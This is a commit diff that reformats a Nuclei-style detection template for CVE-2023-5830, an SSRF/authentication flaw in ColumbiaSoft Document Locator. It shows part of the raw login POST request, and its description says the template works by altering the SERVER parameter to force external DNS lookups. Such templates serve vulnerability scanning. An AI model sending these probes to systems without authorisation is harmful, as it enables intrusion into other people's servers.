fix formatting
parent
4baef3fda5
commit
f74050c474
|
@ -1,14 +1,11 @@
|
|||
id: CVE-2023-5830
|
||||
|
||||
info:
|
||||
name: ColumbiaSoft DocumentLocator - Improper Authentication
|
||||
author: Gonski
|
||||
severity: critical
|
||||
description: Instances of ColumbiaSoft's Document Locator prior to version 7.2
|
||||
SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF
|
||||
vulnerability. This template identifies vulnerable instances of the
|
||||
ColumbiaSoft Document Locater application by confirming external DNS
|
||||
interaction/lookups by modifying the value of the client-side SERVER
|
||||
parameter at /api/authentication/login.
|
||||
description: |
|
||||
Instances of ColumbiaSoft's Document Locator prior to version 7.2 SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF vulnerability. This template identifies vulnerable instances of the ColumbiaSoft Document Locater application by confirming external DNS interaction/lookups by modifying the value of the client-side SERVER parameter at /api/authentication/login.
|
||||
impact: |
|
||||
An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
|
||||
remediation: |
|
||||
|
@ -24,7 +21,7 @@ info:
|
|||
cve-id: CVE-2023-5830
|
||||
cwe-id: CWE-287
|
||||
epss-score: 0.00091
|
||||
epss-percentile: 0.37582
|
||||
epss-percentile: 0.37579
|
||||
cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -36,15 +33,12 @@ info:
|
|||
http:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 30s
|
||||
@timeout: 20s
|
||||
POST /api/authentication/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json;charset=UTF-8
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
{
|
||||
"LoginType":"differentWindows",
|
||||
|
|
Loading…
Reference in New Issue